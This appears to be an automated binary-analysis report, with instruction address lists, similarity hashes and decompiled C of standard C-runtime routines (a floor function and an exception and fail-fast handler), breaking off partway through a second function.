0x00a3b5d0
0x00a3b5d6
0x00a3b5db
0x00a3b5e1
0x00a3b5e1
0x00a3b5e4
0x00a3b5eb
0x00a3b5f2
0x00a3b5f3
0x00a3b5f4
0x00a3b5f9
0x00a3af7e
0x00a3af7e
0x00a3af87
0x00a3af88
0x00a3af92
0x00a3af98
0x00a3af9a
0x00a3b1a0
0x00a3b1a8
0x00a3b1ab
0x00a3b1b0
0x00a3b1b3
0x00a3b1bb
0x00a3b1bf
0x00a3b1c5
0x00a3b1cb
0x00a3b1d0
0x00a3b1d7
0x00a3b1d8
0x00a3b1d8
0x00a3b1d8
0x00a3b1df
0x00a3b1e2
0x00a3b1ea
0x00a3b1f0
0x00a3b1f5
0x00a3b1f5
0x00a3b1f2
0x00a3b1f2
0x00a3b1f2
0x00a3b1f9
0x00a3b1fa
0x00a3b1fc
0x00a3b1ff
0x00a3b205
0x00a3b20b
0x00a3b20e
0x00a3b211
0x00a3b217
0x00a3b21a
0x00a3b21d
0x00a3b227
0x00a3b227
0x00a3b227
0x00a3b21f
0x00a3b21f
0x00a3b221
0x00000000
0x00a3b223
0x00a3b223
0x00a3b223
0x00a3b221
0x00a3b229
0x00a3b22b
0x00a3b31d
0x00a3b31d
0x00a3b31f
0x00a3b324
0x00a3b325
0x00a3b32b
0x00a3b337
0x00a3b33e
0x00a3b33f
0x00a3b340
0x00a3b345
0x00a3b231
0x00a3b231
0x00a3b233
0x00000000
0x00a3b239
0x00a3b23b
0x00a3b23c
0x00a3b23e
0x00a3b240
0x00a3b242
0x00a3b242
0x00a3b249
0x00a3b24a
0x00a3b250
0x00a3b253
0x00a3b261
0x00a3b267
0x00a3b267
0x00a3b269
0x00a3b26c
0x00a3b272
0x00a3b272
0x00a3b274
0x00000000
0x00000000
0x00a3b276
0x00a3b278
0x00a3b27e
0x00a3b27e
0x00a3b27a
0x00a3b27a
0x00a3b27a
0x00a3b283
0x00a3b285
0x00a3b28c
0x00a3b28c
0x00a3b287
0x00a3b287
0x00a3b287
0x00a3b2b2
0x00a3b2b8
0x00a3b2bb
0x00a3b2c1
0x00a3b2c8
0x00a3b2c9
0x00a3b2ca
0x00a3b2d0
0x00a3b2d3
0x00a3b2d5
0x00000000
0x00a3b2d5
0x00000000
0x00a3b2d3
0x00a3b2dd
0x00a3b2e3
0x00a3b2eb
0x00a3b2eb
0x00a3b2ec
0x00a3b2ec
0x00a3b2ee
0x00a3b2f2
0x00a3b2fa
0x00a3b2fa
0x00a3b2fa
0x00a3b2fc
0x00a3b303
0x00a3b308
0x00a3b315
0x00a3b30a
0x00a3b30d
0x00a3b30d
0x00a3b308
0x00a3b233
0x00a3b348
0x00a3b352
0x00a3b358
0x00a3b35e
0x00a3b364
0x00a3afa0
0x00a3afa0
0x00a3afa0
0x00a3afa2
0x00a3afa9
0x00a3afb0
0x00000000
0x00000000
0x00a3afb6
0x00a3afb9
0x00a3afbc
0x00000000
0x00a3afbe
0x00a3afc6
0x00a3afcb
0x00a3afd0
0x00a3afd1
0x00a3afd3
0x00a3afdb
0x00a3afdf
0x00a3afe5
0x00a3afeb
0x00a3aff0
0x00a3aff7
0x00a3aff7
0x00a3aff8
0x00a3affb
0x00a3b003
0x00a3b009
0x00a3b00e
0x00a3b00e
0x00a3b00b
0x00a3b00b
0x00a3b00b
0x00a3b012
0x00a3b013
0x00a3b015
0x00a3b018
0x00a3b01e
0x00a3b024
0x00a3b027
0x00a3b02a
0x00a3b030
0x00a3b033
0x00a3b036
0x00a3b040
0x00a3b040
0x00a3b040
0x00a3b038
0x00a3b038
0x00a3b03a
0x00000000
0x00a3b03c
0x00a3b03c
0x00a3b03c
0x00a3b03a
0x00a3b042
0x00a3b044
0x00a3b139
0x00a3b139
0x00a3b13b
0x00a3b140
0x00a3b141
0x00a3b147
0x00a3b153
0x00a3b15a
0x00a3b15b
0x00a3b15c
0x00a3b161
0x00a3b04a
0x00a3b04a
0x00a3b04c
0x00000000
0x00a3b052
0x00a3b054
0x00a3b055
0x00a3b057
0x00a3b059
0x00a3b05b
0x00a3b05b
0x00a3b062
0x00a3b063
0x00a3b069
0x00a3b06c
0x00a3b07a
0x00a3b080
0x00a3b080
0x00a3b082
0x00a3b085
0x00a3b08b
0x00a3b08b
0x00a3b08d
0x00000000
0x00000000
0x00a3b08f
0x00a3b091
0x00a3b097
0x00a3b097
0x00a3b093
0x00a3b093
0x00a3b093
0x00a3b09c
0x00a3b09e
0x00a3b0ab
0x00a3b0ab
0x00a3b0a0
0x00a3b0a6
0x00a3b0a6
0x00a3b0c9
0x00a3b0d1
0x00a3b0d8
0x00a3b0df
0x00a3b0e0
0x00a3b0e3
0x00a3b0e9
0x00a3b0ef
0x00a3b0f2
0x00a3b0f4
0x00000000
0x00a3b0f4
0x00000000
0x00a3b0f2
0x00a3b0fc
0x00a3b102
0x00a3b102
0x00a3b108
0x00a3b10a
0x00a3b10d
0x00a3b114
0x00a3b116
0x00a3b116
0x00a3b116
0x00a3b118
0x00a3b11f
0x00a3b124
0x00a3b131
0x00a3b126
0x00a3b129
0x00a3b129
0x00a3b124
0x00a3b04c
0x00a3b164
0x00a3b16f
0x00a3b170
0x00a3b171
0x00a3b177
0x00a3b17d
0x00a3b183
0x00a3b183
0x00000000
0x00a3afbc
0x00000000
0x00a3afa2
0x00a3b184
0x00a3b18a
0x00a3b191
0x00a3b192
0x00a3b193
0x00a3b198
0x00a3b198
0x00a3b5fc
0x00a3b606
0x00a3b607
0x00a3b60d
0x00a3b60f
0x00a3ba78
0x00a3ba7a
0x00a3ba7c
0x00a3ba82
0x00a3ba84
0x00a3ba8a
0x00a3ba8c
0x00a3bdde
0x00a3bdde
0x00a3bdde
0x00a3bde0
0x00a3bde6
0x00a3bded
0x00a3bdf3
0x00a3bdf5
0x00a3be93
0x00a3be93
0x00a3be95
0x00a3be96
0x00a3be9c
0x00000000
0x00a3bdfb
0x00a3bdfb
0x00a3bdfe
0x00a3be0a
0x00a3be0a
0x00a3be0c
0x00a3be12
0x00a3be14
0x00a3be14
0x00a3be16
0x00a3be16
0x00a3be1f
0x00a3be26
0x00a3be2c
0x00a3be2f
0x00a3be30
0x00a3be32
0x00a3be32
0x00a3be36
0x00a3be36
0x00a3be38
0x00a3be3a
0x00a3be40
0x00a3be43
0x00000000
0x00a3be45
0x00a3be45
0x00a3be4c
0x00a3be4c
0x00a3be43
0x00a3be38
0x00a3be0c
0x00a3bdfe
0x00a3bdf5
0x00a3ba92
0x00a3ba92
0x00a3ba92
0x00a3ba95
0x00a3ba99
0x00a3ba99
0x00a3ba9a
0x00a3baac
0x00a3bab9
0x00a3bac8
0x00a3baf2
0x00a3baf7
0x00a3bafd
0x00a3bb00
0x00a3bb06
0x00a3bb09
0x00a3bba2
0x00a3bba9
0x00a3bc27
0x00a3bc2d
0x00a3bc33
0x00a3bc36
0x00a3bc38
0x00a3bcc1
0x00a3bc3e
0x00a3bc3e
0x00a3bc44
0x00a3bc44
0x00a3bc4a
0x00a3bc50
0x00a3bc52
0x00a3bc54
0x00a3bc54
0x00a3bc5a
0x00a3bc60
0x00a3bc62
0x00a3bc6a
0x00a3bc6a
0x00a3bc70
0x00a3bc72
0x00a3bc74
0x00a3bc7a
0x00a3bc7c
0x00a3bd93
0x00a3bd94
0x00a3bd95
0x00a3bd9b
0x00a3bd9b
0x00a3bd9e
0x00a3bd9f
0x00000000
0x00a3bc82
0x00a3bc88
0x00a3bc88
0x00a3bc8a
0x00a3bc90
0x00a3bc93
0x00a3bc9a
0x00a3bca0
0x00a3bca2
0x00a3bcc9
0x00a3bccb
0x00a3bcce
0x00a3bccf
0x00a3bcd5
0x00a3bcdb
0x00a3bd75
0x00a3bd75
0x00a3bd78
0x00000000
0x00a3bd7e
0x00a3bd7e
0x00a3bd84
0x00000000
0x00a3bd84
0x00a3bce1
0x00a3bce1
0x00a3bce1
0x00a3bce4
0x00000000
0x00000000
0x00a3bce6
0x00a3bce8
0x00a3bcea
0x00a3bcf3
0x00a3bcf3
0x00a3bcf5
0x00a3bcfb
0x00a3bcfb
0x00a3bd07
0x00a3bd12
0x00a3bd15
0x00a3bd22
0x00a3bd25
0x00a3bd26
0x00a3bd27
0x00a3bd2d
0x00a3bd2f
0x00a3bd35
0x00a3bd3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3bd3d
0x00a3bd3d
0x00a3bd3d
0x00a3bd3f
0x00000000
0x00000000
0x00a3bd41
0x00a3bd44
0x00000000
0x00a3bd4a
0x00a3bd4a
0x00a3bd4c
0x00a3bd4e
0x00a3bd4e
0x00a3bd4e
0x00a3bd59
0x00a3bd59
0x00a3bd5f
0x00a3bd61
0x00a3bd63
0x00a3bd6a
0x00a3bd70
0x00a3bd72
0x00000000
0x00a3bd72
0x00000000
0x00a3bd44
0x00000000
0x00a3bd3d
0x00000000
0x00a3bce1
0x00a3bca4
0x00a3bca4
0x00a3bca6
0x00a3bcac
0x00a3bcb3
0x00a3bcb6
0x00a3bcb6
0x00000000
0x00a3bca6
0x00000000
0x00a3bd8a
0x00a3bd8a
0x00a3bd8b
0x00a3bd8b
0x00000000
0x00a3bc90
0x00a3bbab
0x00a3bbab
0x00a3bbb6
0x00a3bbbd
0x00a3bbc3
0x00a3bbca
0x00a3bbcb
0x00a3bbcc
0x00a3bbd1
0x00a3bbd4
0x00a3bbd6
0x00000000
0x00a3bbdc
0x00a3bbdc
0x00a3bbdf
0x00000000
0x00a3bbe5
0x00a3bbe5
0x00a3bbec
0x00000000
0x00a3bbf2
0x00a3bbfa
0x00a3bc00
0x00a3bc00
0x00a3bc02
0x00a3bc03
0x00a3bc04
0x00a3bc0d
0x00a3bc14
0x00a3bc17
0x00a3bc19
0x00a3bc1a
0x00a3bc1a
0x00000000
0x00a3bc22
0x00a3bbec
0x00a3bbdf
0x00a3bbd6
0x00a3bb0f
0x00a3bb0f
0x00a3bb15
0x00a3bb17
0x00a3bb33
0x00a3bb36
0x00000000
0x00a3bb3c
0x00a3bb3c
0x00a3bb43
0x00000000
0x00a3bb49
0x00a3bb4f
0x00a3bb51
0x00a3bb57
0x00a3bb57
0x00a3bb59
0x00a3bb5a
0x00a3bb5b
0x00a3bb64
0x00a3bb6b
0x00a3bb6e
0x00a3bb6f
0x00a3bb71
0x00a3bb71
0x00a3bb79
0x00a3bb79
0x00a3bb79
0x00a3bb7b
0x00000000
0x00a3bb81
0x00a3bb81
0x00a3bb87
0x00a3bb8a
0x00a3be54
0x00a3be56
0x00a3be57
0x00a3be5d
0x00a3be69
0x00a3be70
0x00a3be71
0x00a3be72
0x00a3be77
0x00a3be7a
0x00a3bb90
0x00a3bb90
0x00a3bb97
0x00000000
0x00a3bb97
0x00a3bb8a
0x00a3bb7b
0x00a3bb43
0x00a3bb19
0x00a3bb19
0x00a3bb1b
0x00a3bb21
0x00a3bb27
0x00a3bb28
0x00a3bda5
0x00a3bda5
0x00a3bdac
0x00a3bdad
0x00a3bdae
0x00a3bdb3
0x00a3bdb6
0x00a3bdb6
0x00a3bdb6
0x00a3bb17
0x00a3bdb8
0x00a3bdb8
0x00a3bdba
0x00a3be81
0x00a3be88
0x00a3be8f
0x00a3bea2
0x00a3bea8
0x00a3bea9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3bdc0
0x00a3bdc6
0x00a3bdc6
0x00a3bdcc
0x00a3bdcc
0x00a3bdd8
0x00000000
0x00a3bdd8
0x00a3b615
0x00a3b615
0x00a3b617
0x00a3b61d
0x00a3b61f
0x00a3b625
0x00a3b625
0x00a3b627
0x00a3b99e
0x00a3b99e
0x00a3b9a0
0x00a3b9ad
0x00a3b9ad
0x00a3b9af
0x00a3ba0e
0x00a3ba11
0x00a3ba17
0x00a3ba1d
0x00a3ba23
0x00a3ba25
0x00a3ba2d
0x00a3ba2d
0x00a3ba2f
0x00a3ba30
0x00a3ba31
0x00a3ba3a
0x00a3ba41
0x00a3ba44
0x00a3ba45
0x00a3ba47
0x00a3ba47
0x00a3ba4f
0x00a3ba51
0x00a3ba57
0x00a3ba5d
0x00a3ba60
0x00000000
0x00a3ba66
0x00a3ba66
0x00a3ba6d
0x00a3ba6d
0x00a3ba60
0x00a3ba51
0x00a3ba25
0x00a3b9b1
0x00a3b9b1
0x00a3b9b3
0x00a3b9b9
0x00a3b9bf
0x00000000
0x00a3b9bf
0x00a3b9af
0x00a3b62d
0x00a3b62d
0x00a3b62d
0x00a3b630
0x00a3b634
0x00a3b634
0x00a3b635
0x00a3b646
0x00a3b647
0x00a3b654
0x00a3b663
0x00a3b68d
0x00a3b692
0x00a3b698
0x00a3b69b
0x00a3b6a1
0x00a3b6a4
0x00a3b720
0x00a3b727
0x00a3b7eb
0x00a3b7f1
0x00a3b7f7
0x00a3b7fa
0x00a3b7fc
0x00a3b885
0x00a3b802
0x00a3b802
0x00a3b808
0x00a3b808
0x00a3b80e
0x00a3b814
0x00a3b816
0x00a3b818
0x00a3b818
0x00a3b81e
0x00a3b824
0x00a3b826
0x00a3b82e
0x00a3b82e
0x00a3b834
0x00a3b836
0x00a3b838
0x00a3b83e
0x00a3b83e
0x00a3b840
0x00a3b957
0x00a3b958
0x00a3b959
0x00a3b95f
0x00a3b95f
0x00000000
0x00a3b846
0x00a3b84c
0x00a3b84c
0x00a3b84e
0x00a3b854
0x00a3b857
0x00a3b85e
0x00a3b864
0x00a3b864
0x00a3b866
0x00a3b88d
0x00a3b88f
0x00a3b892
0x00a3b893
0x00a3b899
0x00a3b89f
0x00a3b939
0x00a3b939
0x00a3b93c
0x00000000
0x00a3b942
0x00a3b942
0x00a3b948
0x00000000
0x00a3b948
0x00a3b8a5
0x00a3b8a5
0x00a3b8a5
0x00a3b8a8
0x00000000
0x00000000
0x00a3b8aa
0x00a3b8ac
0x00a3b8ae
0x00a3b8b7
0x00a3b8b7
0x00a3b8b9
0x00a3b8bf
0x00a3b8bf
0x00a3b8cb
0x00a3b8d6
0x00a3b8d9
0x00a3b8e6
0x00a3b8e9
0x00a3b8ea
0x00a3b8eb
0x00a3b8f1
0x00a3b8f3
0x00a3b8f9
0x00a3b8ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3b901
0x00a3b901
0x00a3b901
0x00a3b901
0x00a3b903
0x00000000
0x00000000
0x00a3b905
0x00a3b908
0x00a3b9c2
0x00a3b9c2
0x00a3b9c4
0x00a3b9ca
0x00a3b9d0
0x00a3b9d1
0x00000000
0x00a3b90e
0x00a3b90e
0x00a3b910
0x00a3b912
0x00a3b912
0x00a3b912
0x00a3b91a
0x00a3b91d
0x00a3b91d
0x00a3b924
0x00a3b925
0x00a3b927
0x00a3b92e
0x00a3b934
0x00a3b936
0x00000000
0x00a3b936
0x00000000
0x00a3b908
0x00000000
0x00a3b901
0x00000000
0x00a3b8a5
0x00a3b868
0x00a3b868
0x00a3b86a
0x00a3b870
0x00a3b877
0x00a3b877
0x00a3b87a
0x00a3b87a
0x00000000
0x00a3b86a
0x00000000
0x00a3b94e
0x00a3b94e
0x00a3b94f
0x00a3b94f
0x00000000
0x00a3b854
0x00a3b72d
0x00a3b734
0x00a3b738
0x00a3b73f
0x00a3b745
0x00a3b74c
0x00a3b74d
0x00a3b74e
0x00a3b753
0x00a3b756
0x00a3b756
0x00a3b758
0x00a3b774
0x00a3b777
0x00000000
0x00a3b77d
0x00a3b77d
0x00a3b784
0x00000000
0x00a3b78a
0x00a3b790
0x00a3b792
0x00a3b798
0x00a3b798
0x00a3b79a
0x00a3b79b
0x00a3b79c
0x00a3b7a5
0x00a3b7ac
0x00a3b7af
0x00a3b7b0
0x00a3b7b2
0x00a3b7b2
0x00000000
0x00a3b79a
0x00a3b784
0x00a3b75a
0x00a3b75c
0x00a3b762
0x00a3b768
0x00a3b769
0x00000000
0x00a3b769
0x00a3b758
0x00a3b6a6
0x00a3b6a6
0x00a3b6ac
0x00a3b6ae
0x00a3b6c3
0x00a3b6c6
0x00000000
0x00a3b6cc
0x00a3b6cc
0x00a3b6d3
0x00000000
0x00a3b6d9
0x00a3b6df
0x00a3b6e1
0x00a3b6e7
0x00a3b6e7
0x00a3b6e9
0x00a3b6ea
0x00a3b6eb
0x00a3b6f4
0x00a3b6fb
0x00a3b6fe
0x00a3b6ff
0x00a3b701
0x00a3b701
0x00a3b7ba
0x00a3b7ba
0x00a3b7ba
0x00a3b7bc
0x00000000
0x00a3b7c2
0x00a3b7c2
0x00a3b7c8
0x00a3b7cb
0x00a3b70e
0x00a3b715
0x00000000
0x00a3b7d1
0x00a3b7d3
0x00a3b7d9
0x00a3b7df
0x00a3b7e0
0x00a3b9d7
0x00a3b9d7
0x00a3b9de
0x00a3b9df
0x00a3b9e0
0x00a3b9e5
0x00a3b9e8
0x00a3b9e8
0x00a3b7cb
0x00a3b7bc
0x00a3b6d3
0x00a3b6b0
0x00a3b6b0
0x00a3b6b2
0x00a3b6b8
0x00a3b962
0x00a3b962
0x00a3b963
0x00a3b969
0x00a3b969
0x00a3b970
0x00a3b971
0x00a3b972
0x00a3b977
0x00a3b97a
0x00a3b97a
0x00a3b97a
0x00a3b6ae
0x00a3b97c
0x00a3b97c
0x00a3b97e
0x00a3b9ec
0x00a3b9f3
0x00a3b9f3
0x00a3b9f3
0x00a3b9fa
0x00a3b9fc
0x00a3ba02
0x00a3ba03
0x00a3beaf
0x00a3beaf
0x00a3beb0
0x00a3beb1
0x00a3beb6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3b980
0x00a3b986
0x00a3b986
0x00a3b98c
0x00a3b98c
0x00a3b998
0x00000000
0x00a3b998
0x00a3b627
0x00a3beb9
0x00a3beb9
0x00a3bebf
0x00a3bec7
0x00a3becd
0x00a3becd
0x00a3becf
0x00a3bed1
0x00a3bed3
0x00a3bed3
0x00a3bed5
0x00a3bed5
0x00a3bede
0x00a3bedf
0x00a3bee3
0x00a3beea
0x00a3beed
0x00a3beee
0x00a3bef0
0x00a3bef0
0x00a3bef4
0x00a3befa
0x00a3befc
0x00a3bf02
0x00a3bf04
0x00a3bf0a
0x00a3bf0d
0x00a3bf20
0x00a3bf22
0x00a3bf23
0x00a3bf29
0x00a3bf35
0x00a3bf3c
0x00a3bf3d
0x00a3bf3e
0x00a3bf43
0x00a3bf0f
0x00a3bf10
0x00a3bf11
0x00a3bf18
0x00a3bf18
0x00a3bf0d
0x00a3bf47
0x00a3bf47
0x00a3bf56
0x00a3bf5f
0x00a3bf60
0x00a3bf62
0x00a3bff9
0x00a3bff9
0x00a3bffb
0x00a3c006
0x00a3c006
0x00a3c008
0x00a3c00b
0x00a3c00d
0x00000000
0x00a3bffd
0x00a3c003
0x00a3c003
0x00a3bf68
0x00a3bf68
0x00a3bf6e
0x00a3bf71
0x00a3bf77
0x00a3bf7a
0x00a3bf80
0x00a3bf82
0x00a3bf8a
0x00a3bf8c
0x00a3bf8c
0x00a3bf8e
0x00a3bf8e
0x00a3bf97
0x00a3bf9b
0x00a3bfa2
0x00a3bfa5
0x00a3bfa6
0x00a3bfa8
0x00a3bfa9
0x00a3bfa9
0x00a3bfad
0x00a3bfb3
0x00a3bfb5
0x00a3bfb7
0x00a3bfbd
0x00a3bfc0
0x00a3bfd3
0x00a3bfd4
0x00a3bfda
0x00a3bfe6
0x00a3bfed
0x00a3bfee
0x00a3bfef
0x00a3bff4
0x00a3bfc2
0x00a3bfc2
0x00a3bfc9
0x00a3bfc9
0x00a3bfc0
0x00a3bfb5
0x00a3c013
0x00a3c013
0x00a3c013
0x00a3c01f
0x00a3c022
0x00a3c028
0x00a3c028
0x00a3c02a
0x00a3c02c
0x00a3c032
0x00a3c034
0x00a3c034
0x00a3c034
0x00a3c032
0x00a3c039
0x00a3c03a
0x00a3c03c
0x00a3c03f
0x00a3c03f
0x00a3c040
0x00a3c046
0x00a3c04c
0x00a3c04e
0x00a3c054
0x00a3c05a
0x00a3c05a
0x00a3c05c
0x00000000
0x00000000
0x00a3c062
0x00a3c065
0x00a3c066
0x00a3c066
0x00a3c068
0x00a3c068
0x00a3c078
0x00a3c07f
0x00a3c082
0x00a3c083
0x00a3c085
0x00a3c085
0x00a3c089
0x00a3c08f
0x00a3c08f
0x00a3c091
0x00a3c093
0x00a3c099
0x00a3c09c
0x00a3c0ad
0x00a3c0af
0x00a3c0b0
0x00a3c0b6
0x00a3c0c2
0x00a3c0c9
0x00a3c0ca
0x00a3c0cb
0x00a3c0d0
0x00a3c09e
0x00a3c09e
0x00a3c0a5
0x00a3c0a5
0x00a3c09c
0x00a3c0e1
0x00a3c0f0
0x00a3c0f1
0x00a3c0f1
0x00a3c0f3
0x00a3c0f5
0x00a3c0f5
0x00a3c0fb
0x00a3c0fe
0x00a3c100
0x00a3c102
0x00a3c102
0x00a3c105
0x00a3c106
0x00a3c106
0x00a3c10b
0x00a3c10e
0x00a3c112
0x00a3c112
0x00a3c113
0x00a3c115
0x00a3c11b
0x00a3c121
0x00000000
0x00000000
0x00000000
0x00a3c121
0x00a3c054
0x00a3c127
0x00a3c127
0x00000000
0x00a3c127
0x00a3aeac
0x00a3aea3
0x00a3ae9a
0x00a3ae51
0x00a3ae52
0x00a3ae55
0x00a3ae5d
0x00000000
0x00a3ae5f
0x00a3ae65
0x00a3ae6a
0x00a3c146
0x00a3c146
0x00a3c149
0x00a3c154
0x00a3c17f
0x00a3c180
0x00a3c181
0x00a3c182
0x00a3c183
0x00a3c184
0x00a3c189
0x00a3c18c
0x00a3c18f
0x00a3c190
0x00a3c193
0x00a3c195
0x00a3c19e
0x00a3c19e
0x00a3c1a0
0x00a3c1b5
0x00a3c1b6
0x00a3c1b9
0x00a3c1bb
0x00a3c1d1
0x00a3c1d7
0x00a3c1df
0x00a3c1e1
0x00a3c1ec
0x00a3c1ef
0x00a3c206
0x00a3c1f1
0x00a3c1f1
0x00a3c1f6
0x00000000
0x00a3c1f6
0x00a3c1e3
0x00a3c1e3
0x00a3c1e8
0x00a3c1f8
0x00a3c1f8
0x00a3c1f9
0x00a3c1fb
0x00a3c201
0x00a3c201
0x00a3c1bd
0x00a3c1bd
0x00a3c1c0
0x00000000
0x00a3c1c2
0x00a3c1c5
0x00a3c1cd
0x00a3c1cd
0x00a3c1c0
0x00a3c1a2
0x00a3c1a2
0x00a3c1a9
0x00a3c1aa
0x00a3c1ac
0x00a3c1b1
0x00a3c1b1
0x00a3c197
0x00a3c197
0x00a3c197
0x00a3c20a
0x00a3c156
0x00a3c156
0x00a3c156
0x00a3c160
0x00a3c168
0x00a3c169
0x00a3c16e
0x00a3c17c
0x00a3c17c
0x00a3c154
0x00a3ae5d

APIs

__floor_pentium4.LIBCMT ref: 00A3AF34

Strings

1#IND, xrefs: 00A3C12C
1#INF, xrefs: 00A3C141
1#SNAN, xrefs: 00A3C133
1#QNAN, xrefs: 00A3C13A

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a34f48dfb9a84e617f2e30dd4491bc37074a4f28549ee5254474a9e27a3f70e9
Instruction ID: 7dab7c13302749739c15ac5681e314217c918978538112d85347eed70641d398
Opcode Fuzzy Hash: a34f48dfb9a84e617f2e30dd4491bc37074a4f28549ee5254474a9e27a3f70e9
Instruction Fuzzy Hash: B2C28E72E186288FDB25CF28DD407EAB7B6EB44314F1442EAE54DE7241E774AE818F50

Uniqueness

Uniqueness Score: -1.00%

Function 00A31755, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00A31755(intOrPtr __edx, intOrPtr __edi) {
				intOrPtr _t38;
				signed int _t49;
				intOrPtr _t51;
				signed char _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				void* _t62;
				void* _t63;

				_t58 = __edi;
				_t57 = __edx;
				_t62 = _t63;
				_push(_t51);
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t56 =  *((intOrPtr*)(_t62 + 8));
					asm("int 0x29");
				}
				 *0xa4e3e8 = 0;
				 *((intOrPtr*)(_t62 - 0x274)) = E00A31E90(_t58, _t62 - 0x324, 0, 0x2cc);
				 *((intOrPtr*)(_t62 - 0x278)) = _t56;
				 *((intOrPtr*)(_t62 - 0x27c)) = _t57;
				 *((intOrPtr*)(_t62 - 0x280)) = _t51;
				 *((intOrPtr*)(_t62 - 0x284)) = 0;
				 *((intOrPtr*)(_t62 - 0x288)) = _t58;
				 *((intOrPtr*)(_t62 - 0x25c)) = ss;
				 *((intOrPtr*)(_t62 - 0x268)) = cs;
				 *((intOrPtr*)(_t62 - 0x28c)) = ds;
				 *((intOrPtr*)(_t62 - 0x290)) = es;
				 *((intOrPtr*)(_t62 - 0x294)) = fs;
				 *((intOrPtr*)(_t62 - 0x298)) = gs;
				asm("pushfd");
				_pop( *_t15);
				 *((intOrPtr*)(_t62 - 0x26c)) =  *((intOrPtr*)(_t62 + 4));
				_t38 = _t62 + 4;
				 *((intOrPtr*)(_t62 - 0x260)) = _t38;
				 *((intOrPtr*)(_t62 - 0x324)) = 0x10001;
				 *((intOrPtr*)(_t62 - 0x270)) =  *((intOrPtr*)(_t38 - 4));
				E00A31E90(_t58, _t62 - 0x58, 0, 0x50);
				 *(_t62 - 0x58) = 0x40000015;
				 *((intOrPtr*)(_t62 - 0x54)) = 1;
				 *((intOrPtr*)(_t62 - 0x4c)) =  *((intOrPtr*)(_t62 + 4));
				_t28 = IsDebuggerPresent() - 1; // -1
				 *(_t62 - 8) = _t62 - 0x58;
				asm("sbb bl, bl");
				 *((intOrPtr*)(_t62 - 4)) = _t62 - 0x324;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter(_t62 - 8);
				if(_t49 == 0) {
					_t49 =  ~(_t54 & 0x000000ff);
					asm("sbb eax, eax");
					 *0xa4e3e8 =  *0xa4e3e8 & _t49;
				}
				return _t49;
			}

0x00a31755
0x00a31755
0x00a31757
0x00a3175e
0x00a31769
0x00a3176b
0x00a3176e
0x00a3176e
0x00a3177f
0x00a3178d
0x00a31793
0x00a31799
0x00a3179f
0x00a317a5
0x00a317ab
0x00a317b1
0x00a317b8
0x00a317bf
0x00a317c6
0x00a317cd
0x00a317d4
0x00a317db
0x00a317dc
0x00a317e5
0x00a317eb
0x00a317ee
0x00a317f4
0x00a31803
0x00a3180e
0x00a31819
0x00a31820
0x00a31827
0x00a31831
0x00a31839
0x00a31842
0x00a31844
0x00a31847
0x00a31849
0x00a31859
0x00a3185b
0x00a31860
0x00a31862
0x00a31864
0x00a31864
0x00a3186f

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00A31762
IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 00A3182A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,00000017,?), ref: 00A31849
UnhandledExceptionFilter.KERNEL32(?,?,?,?,00000017,?), ref: 00A31853

Strings

`Vxt, xrefs: 00A3182A

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID: `Vxt
API String ID: 254469556-3269278918
Opcode ID: 0e7c1bc387597a550f619249d6a4779213c2326b472e15616ac162f6f59d42a2
Instruction ID: b3b1af5c2e830607cb82fd6eb4396d7f824d0f8729d19ffda98aa80e2ade82b7
Opcode Fuzzy Hash: 0e7c1bc387597a550f619249d6a4779213c2326b472e15616ac162f6f59d42a2
Instruction Fuzzy Hash: 4D3118B9C0122C9BDB60DFA5D989ADDBBB8FF49345F1041AAE40CA7210E7365A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A3511E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00A3511E(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr _t68;
				int _t69;
				intOrPtr _t72;
				signed int _t74;
				signed int _t76;

				_t72 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				_t62 = __ebx;
				asm("pushad");
				asm("popad");
				_t74 = _t76;
				_t40 =  *0xa4dc28; // 0x4f268f78
				_t41 = _t40 ^ _t74;
				_v8 = _t40 ^ _t74;
